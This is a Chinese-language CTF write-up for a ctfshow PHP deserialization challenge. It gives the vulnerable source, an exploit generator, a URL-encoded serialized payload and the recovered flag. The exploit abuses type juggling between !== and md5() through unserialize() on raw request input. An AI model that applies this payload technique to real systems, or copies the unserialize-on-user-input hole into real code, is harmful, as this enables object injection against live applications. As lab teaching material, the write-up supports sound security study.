PHP反序列化
要点:if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) 是强比较(!==),只要让 $dsb 与 $this->ctf 类型不同(例如字符串 "123" 与整数 123)就能通过;随后 md5() 会先把参数转成字符串,所以 md5($dsb) === md5($this->ctf) 仍然成立。
if($a == $b) 或 if($a != $b) //弱比较,先做类型转换再比较值,不比较类型
if($a === $b) 或 if($a !== $b) //强比较,既比较数值也比较类型
题目源码
<?php
// Suppress every warning/notice (a failed file_get_contents() further down stays silent)
// and print this file's own source, so the class layout is public to the caller.
error_reporting(0);
highlight_file(__FILE__);
// Challenge gadget: all of the logic lives in __destruct(), which runs as soon as the
// object produced by unserialize() below is freed — no explicit method call is needed.
class ctfshow {
    private $d = '';
    private $s = '';
    private $b = '';
    // Never cast anywhere in this class, so it keeps whatever type the serialized
    // payload assigned to it (a string by default, but an int is accepted as well).
    private $ctf = '';
    public function __destruct() {
        // Only d, s and b are normalised to strings; $ctf is left untouched.
        $this->d = (string)$this->d;
        $this->s = (string)$this->s;
        $this->b = (string)$this->b;
        // Weak (!=) comparison on strings: numeric strings compare by value ("1" != "01" is false).
        if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
            $dsb = $this->d.$this->s.$this->b;
            // No declare(strict_types) in this file, so strlen() on an int $ctf coerces instead of throwing.
            if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
                // Strict (!==) comparison is TRUE whenever the operand types differ, even
                // when both stringify to the same value — so with an uncast $ctf this is
                // not a "must be a different value" guard.
                if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
                    // md5() converts its argument to string first, so md5(123) === md5("123").
                    // Fix: normalise $this->ctf with (string) like the other three fields
                    // before comparing, so the !== check and md5() see the same value.
                    if (md5($dsb) === md5($this->ctf)) {
                        // error_reporting(0) at the top of the file hides a failed read here.
                        echo file_get_contents("/flag.txt");
                    }
                }
            }
        }
    }
}
// SECURITY: unserialize() on raw request input lets the client instantiate any declared
// class with attacker-chosen property values and types, and __destruct() runs without any
// further call. The return value is discarded, so ctfshow::__destruct() fires right here.
// Never unserialize untrusted data — use json_decode(), or at minimum pass
// ['allowed_classes' => false] as the second argument.
unserialize($_GET["dsbctf"]);
构造exp
<?php
/**
 * Payload generator: the serialized form is the whole point, so property order and
 * types must stay exactly as declared here.
 *
 * d, s, b are three distinct one-character strings (pairwise != holds, they join to "123",
 * total length 3). ctf is the INTEGER 123: "123" !== 123 is true because the types differ,
 * while md5(123) === md5("123") because md5() stringifies its argument.
 */
class ctfshow {
    private $d = '1';
    private $s = '2';
    private $b = '3';
    private $ctf = 123;

    // Mirrors the target's casts; irrelevant to serialize(), which records properties only.
    public function __destruct() {
        foreach (['d', 's', 'b'] as $field) {
            $this->{$field} = strval($this->{$field});
        }
    }
}
// Serialize the gadget and URL-encode it: private-property names carry NUL bytes,
// which only survive a query string as %00. The object is kept in a variable so its
// destructor runs at script end, as before.
$gadget = new ctfshow();
$encoded = urlencode(serialize($gadget));
echo $encoded;
?>
payload
https://afa5fce5-baaa-4728-b87d-3dd4d47e6b48.challenge.ctf.show/?dsbctf=O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%222%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%223%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bi%3A123%3B%7D
flag
ctfshow{76d271b2-5e05-4570-9f5c-5e2c954d59f0}